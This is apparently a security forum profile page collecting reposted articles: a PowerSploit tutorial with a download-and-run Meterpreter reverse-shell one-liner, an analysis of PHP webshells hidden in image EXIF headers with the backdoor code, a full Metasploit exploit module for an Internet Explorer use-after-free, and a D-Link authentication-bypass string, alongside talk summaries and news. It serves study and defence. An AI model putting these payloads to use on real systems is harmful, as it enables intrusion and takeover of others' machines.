Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18736

  • Joined

  • Last visited

  • Days Won

    711

 Content Type 

Everything posted by Nytro

  1. Nytro
    PowerSploit: The Easiest Shell You’ll Ever Get 2013/09/18 | Posted in Penetration Testing Sometimes you just want a shell. You don’t want to worry about compiling a binary, testing it against antivirus, figuring out how to upload it to the box and finally execute it. Maybe you are giving a demo of an awesome new Meterpreter post-exploitation module. Maybe you have less than a minute of physical access to a Windows kiosk machine and need a quick win. There are plenty of scenarios that end in a penetration tester gaining GUI access to a target machine through guessed or found RDP, ESX or VNC credentials. In those situations, the easiest way to get a Meterpreter shell without worrying about AV is with PowerSploit. PowerSploit is a collection of security-related modules and functions written in PowerShell. PowerSploit is already in both BackTrack and Kali, and its code is utilized by other awesome tools like SET so you may already be using it! Many of the scripts in the project are extremely useful in post-exploitation in Windows environments. The project was started by Matt Graeber who is the author of the function we will use in this tutorial: Invoke-Shellcode. In order for this to work, the target machine must have PowerShell installed and internet access. The first step is for us to set up our handler on our attacker box. This is something we will likely do often, so let’s automated it with a really simple Python script: To start the multi/handler and configure it, we just run the script: python StartListener.py 192.168.0.15 443 Now that our handler is ready, we can move on to executing our shell. The first thing I did to make the next step easier to type is shorten the github link to Invoke-Shellcode with bitly: Next, we need to run two commands in a PowerShell prompt to get our Meterpreter shell. The first command will create a .Net WebClient Object to download the function and pass it to Invoke-Expression to put it into memory: IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/14bZZ0c’) Now we just need to make a call to the Invoke-Shellcode function with the relevant parameters from the listener: Invoke-Shellcode –Payload windows/meterpreter/reverse_https –Lhost 192.168.0.15 –Lport 443 –Force We can actually combine these commands to run a single command to execute our shell: IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/14bZZ0c’); Invoke-Shellcode –Payload windows/meterpreter/reverse_https –Lhost 172.0.1.200 –Lport 443 –Force Once we get the prompt back, we can safely close PowerShell because the ultra-useful Smart_Migrate Meterpreter script has safely landed us in a new process: That is the easiest and most convenient AV-bypass I have ever seen! Just open PowerShell and type a command. Hopefully this post has shown you one way PowerSploit can make your life as a pen-tester easier. You can find more ways at my blog and by following me on twitter. Also, join me at Derbycon when I will talk about the Pass-the-Hash attack and some simple mitigations with Skip Duckwall and how to use PowerSploit and Windows tools to accomplish post-exploitation tasks without uploading binaries with Matt Graeber. I hope to see you all there! -Chris Sursa: Pentest Geek
  2. Nytro
    Derbycon 2013 - An Encyclpwnia Of Persistence - Skip Duckwall, Will Peteroy Description: While I was working on a Linux boot CD for Red Team operations I started researching various persistence techniques that were out there in “the real world”. Pretty soon a couple of pages of notes became a notebook full of information. Based on public information from incident reports, AV vendors, blogs, and con talks, I started trying to categorize the various techniques to make them easier to digest. One thing that immediately jumped out was that nobody had apparently tried to do this before. With help from another former Red Teamer, Will, we were able to categorize over 20 different ways that somebody could attain persistence. Our hope is that our talk will benefit both the folks who have to defend and those who provide threat emulation by providing details about real world persistence methods. Bio: “Skip Spoke at BHUSA 2012, Defcon 19, Derbycon Former Red Teamer Bunch of certs… working for Accuvant Labs Will Spoke at Bsides a couple of places (PDX, SEA) Former Red Teamer Certs and degrees and shit Currently doing penance for RT work at Microsoft Security Response Center” For More Information please visit : - DerbyCon : Louisville, Kentucky Derbycon 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos) Sursa: Derbycon 2013 - An Encyclpwnia Of Persistence - Skip Duckwall, Will Peteroy
  3. Nytro
    Derbycon 2013 - Antivirus Evasion: Lessons Learned – Thelightcosine Description: Over the past year, the speaker has spent alot of time talking with people in the infoSec Community and doing research on antivirus evasion techniques. Learning what works and what doesn't. There are a lot of good ideas floating around out there. In this talk we're going to pull those ideas all together. We'll discuss the basics of the AV evasion problem, what techniques work, which ones don't and why. The talk will have a particular focus on AV evasion as it relates to Metasploit payloads. Bio: David "thelightcosine" Maloney is a Senior Software Engineer on the Metasploit team at Rapid7. Before that he was a Penetration Tester for some large Corporations, specializing in Web Applications and was a longtime contrutor to the Metasploit Framework. He is a member of the Corelan Security Team, and sort of an auxiliary member of the FALE locksport group. He is one of the founders of Hackerspace Charlotte in NC. For More Information please visit : - DerbyCon : Louisville, Kentucky Derbycon 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos) Sursa: Derbycon 2013 - Antivirus Evasion: Lessons Learned – Thelightcosine
  4. Nytro
    [h=3]Hiding Webshell Backdoor Code in Image Files[/h] First appearances may be deceiving... Web attackers have have been using a method of stashing pieces of their PHP backdoor exploit code within the meta-data headers of these image files to evade detections. This is not a completely new tactic however it is not as well known by the defensive community so we want to raise awareness. Let's first take a quick look at why this technique is being utlized by attackers. [h=1]Standard Webshell Backdoor Code[/h] There are many methods attackers employ to upload Webshell backdoor code onto compromised web servers including Remote File Inclusion (RFI), Wordpress TimThumb Plugin and even non-web attack vectors such as Stolen FTP Credentials. Here is a graphic taken from this years Trustwave SpiderLabs Global Security Report that lists the top malicious file types uploaded to compromised web servers: Let's take a look at a standard obfuscated R57 shell example: Notice the Base64 encoded parameter data and then the PHP Eval call at the end. Once PHP executes this code, it will decode and inflate the data stream and the result will be a basic file uploader webshell similar to the following: [h=1]Incident Response Steps - Identification and Eradication[/h] These types of attacks and compromises are so prevalent in Shared Hosting environments where end users do not properly update their web application software. In response to these types of scenarios, Hosting Provider security teams often employ OS-level back-end processes that scan the local file systems looking for tell-tale signs of webshell backdoor code. One example tool is called MalDetect. This script can be run to analyze files and detect various forms of malicious code. If we run maldetect against our example R57 webshell file we get the following: $ sudo /usr/local/maldetect/maldet --config-option quar_hits=0,quar_clean=0,clamav_scan=1 -a "/tmp/lin.php" Linux Malware Detect v1.4.2 (C) 2002-2013, R-fx Networks <proj@r-fx.org> (C) 2013, Ryan MacDonald <ryan@r-fx.org> inotifywait (C) 2007, Rohan McGovern <rohan@mcgovern.id.au> This program may be freely redistributed under the terms of the GNU GPL v2 maldet(92294): {scan} signatures loaded: 9011 (7145 MD5 / 1866 HEX) maldet(92294): {scan} building file list for /tmp/lin.php, this might take awhile... maldet(92294): {scan} file list completed, found 1 files... maldet(92294): {scan} 1/1 files scanned: 0 hits 0 cleaned maldet(92294): {scan} scan completed on /tmp/lin.php: files 1, malware hits 1, cleaned hits 0 maldet(92294): {scan} scan report saved, to view run: maldet --report 101113-1250.92294 maldet(92294): {scan} quarantine is disabled! set quar_hits=1 in conf.maldet or to quarantine results run: maldet -q 101113-1250.92294 $ sudo maldet --report 101113-1250.92294 malware detect scan report for MacBook-Pro-2.local: SCAN ID: 101113-1250.92294 TIME: Oct 11 12:50:48 -0400 PATH: /tmp/lin.php TOTAL FILES: 1 TOTAL HITS: 1 TOTAL CLEANED: 0 NOTE: quarantine is disabled! set quar_hits=1 in conf.maldet or to quarantine results run: maldet -q 101113-1250.92294 FILE HIT LIST: {MD5}base64.inject.unclassed.1 : /tmp/lin.php =============================================== Linux Malware Detect v1.4.2 < proj@rfxn.com > As you can see, maldetect identified this PHP file with of of its generic base64 injection signatures. While this indivudual file scanning does work, for managability, most organizations opt to run maldetect as part of an ogoing automated process run through scheduling tools such as Cron. The big problem with this process is that, for performance reasons, many organizations opt to only scan PHP files and exclude other file types from being scanned... [h=1]Hiding Webshell Backdoor Code in Image Files[/h] This brings us back to the beginning of the blog post. Due to the cleanup tactics used by most organizations, the bad guys had to figure out a method of hiding their backdoor code in places that most likely would not be inspected. In this case, we are talking about hiding PHP code data within the Exif image header fields. The concept of Stegonography is not new and there have been many past examples of its use for passing data, however we are now seeing it used for automated code execution. I do want to give a proper hat-tip to the Sucuri Research Team who also found similar techniques being employed. [h=2]PHP Code In EXIF Headers[/h] If you were to view-source in a browser or use something like the unix strings command, you could see the new code added to the top of the image files: After uploading this file to VirusTotal, you can see a more friendly representation of the EXIF fields: As you can see, the PHP code is held within the EXIF "Model" and "Make" fields. This data does not in any way interfere with the proper rendering of the image file itself. [h=2]PHP's exif_read_data function[/h] PHP has a function called exif_read_data which allows it to read the header data of image files. It is used extensivly in many different plugins and tools. Here is an example from Facebook's GitHub Repo: [h=2]Updated PHP Webshell Code[/h] So, with pieces of their webshell stashes away within the EXIF headers of either local or remote image files, the attackers can then modify their PHP code to leverage the PHP exif_read_data function like this: [phpcode]<?php $exif = exif_read_data('http://REDACTED/images/stories/Logo_Coveright.jpg'); preg_replace($exif['Make'],$exif['Model'],''); ?>[/phpcode] The first line downloads a remote jpg image file with the stashes code in it and then sets the $exif variable with the array value. We can modify this PHP code to simulate this by downloading the same files and then dumping the $exif data: [phpcode]<? $exif = exif_read_data('http://REDACTED/images/stories/Logo_Coveright.jpg'); var_dump($exif); ?>[/phpcode] When executing this php file, we get the following output: $ php ./exif_dumper.php array(9) { ["FileName"]=> string(18) "Logo_Coveright.jpg" ["FileDateTime"]=> int(0) ["FileSize"]=> int(6159) ["FileType"]=> int(2) ["MimeType"]=> string(10) "image/jpeg" ["SectionsFound"]=> string(13) "ANY_TAG, IFD0" ["COMPUTED"]=> array(5) { ["html"]=> string(23) "width="155" height="77"" ["Height"]=> int(77) ["Width"]=> int(155) ["IsColor"]=> int(1) ["ByteOrderMotorola"]=> int(0) } ["Make"]=> string(5) "/.*/e" ["Model"]=> string(108) "eval(base64_decode('aWYgKGlzc2V0KCRfUE9TVFsienoxIl0pKSB7ZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));" } The final setup in this process is to execute the PHP preg_replace function. [phpcode]<?php $exif = exif_read_data('http://REDACTED/images/stories/Logo_Coveright.jpg'); preg_replace($exif['Make'],$exif['Model'],''); ?>[/phpcode] Notice that the $exif['Make'] variable data uses the "/.*/e" PCRE regex modifier (PREG_REPLACE_EVAL) which will evaluate the data from the $exif['Model'] variable. In this case, it would execute the base64_decode which results in the following PHP snippet of code: [phpcode]if (isset($_POST["zz1"])) {eval(stripslashes($_POST["zz1"]));}[/phpcode] This code checks to see if there is a POST request body named "zz1" and if there is, it will then eval the contents. This makes it quite easy for attackers to sprinkle backdoor access code by injecting other legitimate PHP files with this combination of exif_read_data and preg_replace code. [h=1]How Widespread?[/h] We can not accurately estimate how widespread this technique is being used however there is a small amount of empirical evidence by simply using public search engines to flag any web pages that list characteristics of either EXIF code hiding or searching for this specific base64 encoded string value. There are hundreds of examples of this base64 encoded data being present within image files. [h=1]Recommendations[/h] [h=2]Scan All Files for Malicious Code[/h] If you are running OS level scanning of files on disk, carefully consider which file-types you want to include/exclude. As this scenario shows, attackers can take advantage of your excluded content to hide their code. [h=2]Scan Files During Attachment Uploading using ModSecurity[/h] When end users are uploading images as file attachments, ModSecurity has the ability to: Extract the file and dump it to a tmp file on disk Execute the @inspectFile operator to analyze the file Block uploading if malware is found The maldetect README file even includes instructions on how to integrate it with ModSecurity: the approver script "/usr/local/maldetect/modsec.sh": 0 maldet: {HEX}php.cmdshell.r57.317 /tmp/20111120-....-file [file "/usr/local/apache/conf/modsec2.user.conf"] [line "3"] [severity "CRITICAL"]Message: Access denied with code 406 (phase 2). File "/tmp/20111120-....-file" rejected by Sursa: Hiding Webshell Backdoor Code in Image Files - SpiderLabs Anterior.: 12 [ MODSECURITY2 UPLOAD SCANNING ] The support for HTTP upload scanning is provided through mod_security2's inspectFile hook. This feature allows for a validation script to be used in permitting or denying an upload. The convenience script to faciliate this is called modsec.sh and is located in the /usr/local/maldetect installation path. The default setup is to run a standard maldet scan with no clamav support, no cleaner rule executions and quarantining enabled; these options are set in the interest of performance vs accuracy which is a fair tradeoff. The scan options can be modified in the modsec.sh file if so desired, the default scan options are as follows: --config-option quar_hits=1,quar_clean=0,clamav_scan=0 --modsec -a "$file" There is a tangible performance difference in disabling clamav scanning in this usage scenario. The native LMD scanner engine is much faster than the clamav scanner engine in single file scans by a wide margin. A single file scan using clamav takes roughly 3sec on average while the LMD scanner engine takes 0.5sec or less. To enable upload scanning with mod_security2 you must set enable the public_scan option in conf.maldet (public_scan=1) then add the following rules to your mod_security2 configuration. These rules are best placed in your modsec2.user.conf file on cpanel servers or at the top of the appropraite rules file for your setup. /usr/local/apache/conf/modsec2.user.conf (or similar mod_security2 rules file): SecRequestBodyAccess On SecRule FILES_TMPNAMES "@inspectFile /usr/local/maldetect/modsec.sh" \ "log,auditlog,deny,severity:2,phase:2,t:none" A restart of the HTTPd service is required following these changes. When an upload takes place that is determined to be malware, it will be rejected and an entry will appear in the mod_security2 SecAuditLog file. On cpanel servers and most configurations this is the modsec_audit.log located under /usr/local/apache/logs or /var/log/httpd. The log entry will appear similar to the following:
  5. Nytro
    MS13-080 (CVE-2013-3897): Internet Explorer CDisplayPointer Use-After-Free Added by sinn3r . about 15 hours ago Add MS13-080 (CVE-2013-3897): Internet Explorer CDisplayPointer Use-After-Free This module exploits a vulnerability found in Microsoft Internet Explorer. It was originally found being exploited in the wild targeting Japanese and Korean IE8 users on Windows XP, around the same time frame as CVE-2013-3893, except this was kept out of the public eye by multiple research companies and the vendor until the October patch release. This issue is a use-after-free vulnerability in CDisplayPointer via the use of a "onpropertychange" event handler. To setup the appropriate buggy conditions, we first craft the DOM tree in a specific order, where a CBlockElement comes after the CTextArea element. If we use a select() function for the CTextArea element, two important things will happen: a CDisplayPointer object will be created for CTextArea, and it will also trigger another event called "onselect". The "onselect" event will allow us to setup for the actual event handler we want to abuse - the "onpropertychange" event. Since the CBlockElement is a child of CTextArea, if we do a node swap of CBlockElement in "onselect", this will trigger "onpropertychange". During "onpropertychange" event handling, a free of the CDisplayPointer object can be forced by using an "Unslect" (other approaches also apply), but a reference of this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after the CDoc::GetLineInfo call, because it is still trying to use that to update CDisplayPointer's position. When this invalid reference arrives in QIClassID, a crash finally occurs due to accessing the freed memory. By controling this freed memory, it is possible to achieve arbitrary code execution under the context of the user. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::RopDb include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::IE, :ua_minver => "8.0", :ua_maxver => "8.0", :javascript => true, :os_name => OperatingSystems::WINDOWS, :rank => NormalRanking }) def initialize(info={}) super(update_info(info, 'Name' => "MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free", 'Description' => %q{ This module exploits a vulnerability found in Microsoft Internet Explorer. It was originally found being exploited in the wild targeting Japanese and Korean IE8 users on Windows XP, around the same time frame as CVE-2013-3893, except this was kept out of the public eye by multiple research companies and the vendor until the October patch release. This issue is a use-after-free vulnerability in CDisplayPointer via the use of a "onpropertychange" event handler. To setup the appropriate buggy conditions, we first craft the DOM tree in a specific order, where a CBlockElement comes after the CTextArea element. If we use a select() function for the CTextArea element, two important things will happen: a CDisplayPointer object will be created for CTextArea, and it will also trigger another event called "onselect". The "onselect" event will allow us to setup for the actual event handler we want to abuse - the "onpropertychange" event. Since the CBlockElement is a child of CTextArea, if we do a node swap of CBlockElement in "onselect", this will trigger "onpropertychange". During "onpropertychange" event handling, a free of the CDisplayPointer object can be forced by using an "Unslect" (other approaches also apply), but a reference of this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after the CDoc::GetLineInfo call, because it is still trying to use that to update CDisplayPointer's position. When this invalid reference arrives in QIClassID, a crash finally occurs due to accessing the freed memory. By controling this freed memory, it is possible to achieve arbitrary code execution under the context of the user. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Exploit in the wild 'sinn3r' # Metasploit ], 'References' => [ [ 'CVE', '2013-3897' ], [ 'OSVDB', '98207' ], [ 'MSB', 'MS13-080' ], [ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/10/08/ms13-080-addresses-two-vulnerabilities-under-limited-targeted-attacks.aspx' ], [ 'URL', 'http://jsunpack.jeek.org/?report=847afb154a4e876d61f93404842d9a1b93a774fb' ] ], 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'IE 8 on Windows XP SP3', {} ], [ 'IE 8 on Windows 7', {} ] ], 'Payload' => { 'BadChars' => "\x00", 'PrependEncoder' => "\x81\xc4\x0c\xfe\xff\xff" # add esp, -500 }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Privileged' => false, # Jsunpack first received a sample to analyze on Sep 12 2013. # MSFT patched this on Oct 8th. 'DisclosureDate' => "Oct 08 2013", 'DefaultTarget' => 0)) end def get_check_html %Q|<html> <script> #{js_os_detect} function os() { var detect = window.os_detect.getVersion(); var os_string = detect.os_name + " " + detect.os_flavor + " " + detect.ua_name + " " + detect.ua_version; return os_string; } function dll() { var checka = 0; var checkb = 0; try { checka = new ActiveXObject("SharePoint.OpenDocuments.4"); } catch (e) {} try { checkb = new ActiveXObject("SharePoint.OpenDocuments.3"); } catch (e) {} if ((typeof checka) == "object" && (typeof checkb) == "object") { try{location.href='ms-help://'} catch(e){} return "office2010"; } else if ((typeof checka) == "number" && (typeof checkb) == "object") { try{location.href='ms-help://'} catch(e){} return "office2007"; } return "default"; } window.onload = function() { window.location = "#{get_resource}/search?o=" + os() + "&d=" + dll(); } </script> </html> | end def junk rand_text_alpha(4).unpack("V")[0].to_i end def get_payload(target_info) rop_payload = '' case target_info[:dll] when 'office2007' pivot = [ 0x51c2213f, # xchg eax,esp # popad # add byte ptr [eax],al # retn 4 junk, # ESI due to POPAD junk, # EBP due to POPAD junk, junk, # EBX due to POPAD junk, # EDX due to POPAD junk, # ECX due to POPAD 0x51c5d0a7, # EAX due to POPAD (must be writable for the add instruction) 0x51bd81db, # ROP NOP junk # Padding for the retn 4 from the stack pivot ].pack("V*") rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2007', 'pivot'=>pivot}) when 'office2010' pivot = [ 0x51c00e64, # xchg eax, esp; add eax, [eax]; add esp, 10; mov eax,esi; pop esi; pop ebp; retn 4 junk, junk, junk, junk, junk, 0x51BE7E9A, # ROP NOP junk # Padding for the retn 4 from the stack pivot ].pack("V*") rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>pivot}) when 'default' if target_info[:os] =~ /windows xp/i # XP uses msvcrt.dll pivot = [ 0x77C3868A # xchg eax,esp; rcr [ebx-75], 0c1h; pop ebp; ret ].pack("V*") rop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp', 'pivot'=>pivot}) else # Assuming this is Win 7, and we'll use Java 6 ROP pivot = [ 0x7c342643, # xchg eax,esp # pop edi # add byte ptr [eax],al # pop ecx # retn junk # Padding for the POP ECX ].pack("V*") rop_payload = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot}) end end rop_payload end def get_sploit_html(cli, target_info) os = target_info[:os] dll = target_info[:dll] js_payload = '' if os =~ /Windows (7|XP) MSIE 8\.0/ print_status("Target uses #{os} with #{dll} DLL... engaging.") js_payload = Rex::Text.to_unescape(get_payload(target_info)) else print_error("Target uses #{os} with #{dll} DLL... not supported by this attack.") return "" end %Q|<html> <head> <script> #{js_property_spray} sprayHeap({shellcode:unescape("#{js_payload}")}); var earth = document; var data = ""; for (i=0; i<17; i++) { if (i==7) { data += unescape("%u2020%u2030"); } else { data += "\\u4141\\u4141"; } } data += "\\u4141"; function butterfly() { for(i=0; i<20; i++) { var effect = earth.createElement("div"); effect.className = data; } } function kaiju() { var godzilla = earth.createElement("textarea"); var minilla = earth.createElement("pre"); earth.body.appendChild(godzilla); earth.body.appendChild(minilla); godzilla.appendChild(minilla); godzilla.onselect=function(e) { minilla.swapNode(earth.createElement("div")); } var battleStation = false; var war = new Array(); godzilla.onpropertychange=function(e) { if (battleStation == true) { for (i=0; i<50; i++) { war.push(earth.createElement("span")); } } earth.execCommand("Unselect"); if (battleStation == true) { for (i=0; i < war.length; i++) { war[i].className = data; } } else { battleStation = true; } } butterfly(); godzilla.select(); } </script> </head> <body onload='kaiju()'> </body> </html> | end def on_request_uri(cli, request) if request.uri =~ /search\?o=(.+)\&d=(.+)$/ target_info = { :os => Rex::Text.uri_decode($1), :dll => Rex::Text.uri_decode($2) } sploit = get_sploit_html(cli, target_info) send_response(cli, sploit, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'}) return end html = get_check_html print_status("Checking out target...") send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'}) end end =begin +hpa this for debugging or you might not see a crash at all 0:005> r eax=d6091326 ebx=0777efd4 ecx=00000578 edx=000000c8 esi=043bbfd0 edi=043bbf9c eip=6d6dc123 esp=043bbf7c ebp=043bbfa0 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 mshtml!QIClassID+0x30: 6d6dc123 8b03 mov eax,dword ptr [ebx] ds:0023:0777efd4=???????? 0:005> u mshtml!QIClassID+0x30: 6d6dc123 8b03 mov eax,dword ptr [ebx] 6d6dc125 8365e800 and dword ptr [ebp-18h],0 6d6dc129 8d4de8 lea ecx,[ebp-18h] 6d6dc12c 51 push ecx 6d6dc12d 6870c16d6d push offset mshtml!IID_IProxyManager (6d6dc170) 6d6dc132 53 push ebx 6d6dc133 bf02400080 mov edi,80004002h 6d6dc138 ff10 call dword ptr [eax] =end Sursa: Revision 79c612cd - Add MS13-080 (CVE-2013-3897): Internet Explorer CDisplayPointer Use-After-Fre... - Metasploit Framework - Metasploit Redmine Interface
  6. Nytro
    [h=1]Kdms Team hackers hijack Rapid7 website using faxed DNS change request[/h] [h=2]“Hacking like it’s 1964”[/h] By John E Dunn | Techworld | Published: 17:01, 11 October 2013 A pro-Palestinian hacktivist group managed to briefly hijack the Metasploit website of security firm Rapid7 on Friday after faxing a DNS change request to its registrar, the firm’s chief research officer HD Moore has admitted. News of the attack emerged when newbie hackers ‘Kdms Team’ announced the takeover on Twitter with a series of brief messages concluding with a simple “Hello Rapid7.” The attack appears to have lasted for a period of nearly an hour before Rapid7’s Moore took to Twitter to reply. “I can confirm that the DNS settings were changed for a few minutes and pointed to 74.53.46.114,” he said. After ruefully admitting the attack had been “creative”, Moore said that it had occurred after a simple bogus fax request to its registrar, Register.com. “Hacking like its 1964,” Moore added, gamely. Earlier this week, the same Kdms Team burst on to the hacktivist scene with an identical and equally embarrassing attack and on several Internet firms, including security firms AVG, Avira and messaging firm WhatsApp. That attack pivoted around a more orthodox password change request to Network Solutions. Where the group got the DNS change idea from is no mystery. In late August the New York Times suffered a serious domain-redirection attack by the Syrian Electronic Army (SEA) that kept the site offline for several days. As with the New York Times, Rapid's Moore admitted the firm does not use domain locking to raise the level of authentication require for DNS change requests. “We sign binaries, publish checksums, and authenticate updates, so not a big deal, just annoying,” commented Moore. “When security companies can be hijacked, that's a good indicator of how fragile DNS is and what a single point of failure DNS providers have become,” commented Robert Hansen, technical evangelist at WhiteHat Security. “Hijacking session tokens, stealing usernames and passwords and redirecting email are just some of the things that become possible when DNS is hijacked,” he said. Sursa: Kdms Team hackers hijack Rapid7 website using faxed DNS change request - Techworld.com
  7. Nytro
    [h=1]PHP Infector[/h] Posted on October 12, 2013 by darryl A reader wanted me to analyze a PHP file that was found on his hacked WordPress site. The script is made up of three parts as you can see. The top two sections contain an array of Base64-encoded strings. The bottom section references the arrays and performs the main functions. My first thought was to replace each of the array variables with the actual decoded strings. Then I could read the script at the bottom and figure out what it’s doing. But replacing each of the variable names with the values from the array manually would be a pain! (Anyone got a better idea? If so, let me know.) Whenever I come across a problem, I try to find a generic solution that I can keep using in the future. Here’s what I came up with… First I take each of the top two sections and separate the encoded values by rows. So I take this: And use search/replace to make it look like this: Then I modified Converter to base64-decode each row separately: Then I replaced each row with a pipe delimiter (since it wasn’t being used anywhere): I did the same for the second section: I wrote a program that does a search and replace of the array values. I entered the search string that corresponded to the top section and pasted in the decoded strings with the pipe delimiter to get the result. The second section was next. All done! This script probably won’t execute properly because some of the strings need to be quoted but at least you can get a much better idea of what’s going on. Basically this downloads a file from a website, gets the URL and visits it. It essentially serves up a drive-by link to unsuspecting visitors. The iframe link is the landing page of Sweet Orange. The link changes every couple of minutes or so. I’ll need to think about this more and see if there’s another generic solution. If not, I’ll add this method to Converter in the future. Sursa: PHP Infector | Kahu Security
  8. Nytro
    [h=1]Rouge_AP v9 for Kali Linux[/h] my rouge ap that steals creds from https, running under kali linux. in this demo, my host is a laptop with 2 wireless adapters. one is connected to wifi accsess point and then using other wlan adapter for rouge connections. Get it here: https://app.box.com/s/iaij9vpf64f0r90...
  9. Nytro
    Reverse Engineering a D-Link Backdoor By Craig | October 12, 2013 All right. It’s Saturday night, I have no date, a two-liter bottle of Shasta and my all-Rush mix-tape… . On a whim I downloaded firmware v1.13 for the DIR-100 revA. Binwalk quickly found and extracted a SquashFS file system, and soon I had the firmware’s web server (/bin/webs) loaded into IDA: Strings inside /bin/webs Based on the above strings listing, the /bin/webs binary is a modified version of thttpd which provides the administrative interface for the router. It appears to have been modified by Alphanetworks (a spin-off of D-Link). They were even thoughtful enough to prepend many of their custom function names with the string “alpha”: Alphanetworks’ custom functions The alpha_auth_check function sounds interesting! This function is called from a couple different locations, most notably from alpha_httpd_parse_request: Function call to alpha_auth_check We can see that alpha_auth_check is passed one argument (whatever is stored in register $s2); if alpha_auth_check returns -1 (0xFFFFFFFF), the code jumps to the end of alpha_httpd_parse_request, otherwise it continues processing the request. Some further examination of the use of register $s2 prior to the alpha_auth_check call indicates that it is a pointer to a data structure which contains char* pointers to various pieces of the received HTTP request, such as HTTP headers and the requested URL: $s2 is a pointer to a data structure We can now define a function prototype for alpha_auth_check and begin to enumerate elements of the data structure: struct http_request_t{ char unknown[0xB8]; char *url; // At offset 0xB8 into the data structure }; int alpha_auth_check(struct http_request_t *request); alpha_auth_check itself is a fairly simple function. It does a few strstr’s and strcmp’s against some pointers in the http_request_t structure, then calls check_login, which actually does the authentication check. If the calls to any of the strstr’s / strcmp’s or check_login succeed, it returns 1; else, it redirects the browser to the login page and returns -1: alpha_auth_check code snippet Those strstr’s look interesting. They take the requested URL (at offset 0xB8 into the http_request_t data structure, as previously noted) and check to see if it contains the strings “graphic/” or “public/”. These are sub-directories under the device’s web directory, and if the requested URL contains one of those strings, then the request is allowed without authentication. It is the final strcmp however, which proves a bit more compelling: An interesting string comparison in alpha_auth_check This is performing a strcmp between the string pointer at offset 0xD0 inside the http_request_t structure and the string “xmlset_roodkcableoj28840ybtide”; if the strings match, the check_login function call is skipped and alpha_auth_check returns 1 (authentication OK). A quick Google for the “xmlset_roodkcableoj28840ybtide” string turns up only a single Russian forum post from a few years ago, which notes that this is an “interesting line” inside the /bin/webs binary. I’d have to agree. So what is this mystery string getting compared against? If we look back in the call tree, we see that the http_request_t structure pointer is passed around by a few functions: It turns out that the pointer at offset 0xD0 in the http_request_t structure is populated by the httpd_parse_request function: Checks for the User-Agent HTTP header Populates http_request_t + 0xD0 with a pointer to the User-Agent header string This code is effectively: if(strstr(header, "User-Agent:") != NULL){ http_request_t->0xD0 = header + strlen("User-Agent:") + strspn(header, " \t"); } Knowing that offset 0xD0 in http_request_t contains a pointer to the User-Agent header, we can now re-construct the alpha_auth_check function: #define AUTH_OK 1#define AUTH_FAIL -1 int alpha_auth_check(struct http_request_t *request) { if(strstr(request->url, "graphic/") || strstr(request->url, "public/") || strcmp(request->user_agent, "xmlset_roodkcableoj28840ybtide") == 0) { return AUTH_OK; } else { // These arguments are probably user/pass or session info if(check_login(request->0xC, request->0xE0) != 0) { return AUTH_OK; } } return AUTH_FAIL; } In other words, if your browser’s user agent string is “xmlset_roodkcableoj28840ybtide” (no quotes), you can access the web interface without any authentication and view/change the device settings (a DI-524UP is shown, as I don’t have a DIR-100 and the DI-524UP uses the same firmware): Accessing the admin page of a DI-524UP Based on the source code of the HTML pages and some Shodan search results, it can be reasonably concluded that the following D-Link devices are likely affected: DIR-100 DI-524 DI-524UP DI-604S DI-604UP DI-604+ TM-G5240 Additionally, several Planex routers also appear to use the same firmware: BRL-04UR BRL-04CW You stay classy, D-Link. Bookmark the permalink. Sursa: Reverse Engineering a D-Link Backdoor - /dev/ttyS0
  10. Nytro
    [h=3]CreateRemoteThread vs. RtlCreateUserThread[/h]In this post i will shed the light on a slight difference between the "CreateRemoteThread" and "RtlCreateUserThread" functions. I will also show how this slight difference could affect your code, esp. if you are implementing an anti-attaching trick. The difference is in the way the CONTEXT structure is initialized for the new thread. Let's first take the "CreateRemoteThread" function in disassembly. On Windows XP SP3, at address 0x7C810550, We can see a call to the non-exported "_BaseInitializeContext@20" function which as its name implies sets initial values for registers of the CONTEXT structure. Here, we focus on only two registers, EIP and EAX which are set in the following manner: 1) The EIP register is set to the address of either "_BaseThreadStartThunk@8" or "_BaseProcessStartThunk@8" depending on the fifth parameter (in this case, the fifth parameter is set to TRUE and EIP is set to the address of "_BaseThreadStartThunk@8"). 2) The EAX register is set to the user-defined entry point (User-defined here means the value passed to the "CreateRemoteThread" function in the "lpStartAddress" parameter). Now the very first thing we conclude is that "BaseThreadStartThunk@8" later executes the user-defined entry point. Now let's take the "RtlCreateUserThread" function in disassembly and see how the CONTEXT structure for the new thread is initialized. As you can see in the image above, a different function, "RtlInitializeContext", is used for this task. Going into this function, we can see that it is as simple as setting : 1)The EAX register to zero. 2) The EIP register to the user-defined entry point. A question arises here!!. what is this useful for? If a thread tries to query its own entry point by calling the "ZwQueryInformationThread" function with the "ThreadInformationClass" parameter set to ThreadQuerySetWin32StartAddress, then the initial value of EAX is the value returned in the "ThreadInformation" parameter. In most cases, this is okay since almost all threads are created by the "CreateRemoteThread" function and hence the user-defined entry point is always returned. But threads created by the "RtlCreateUserThread" function (e.g. threads created by debuggers to attach to running processes) will not be able 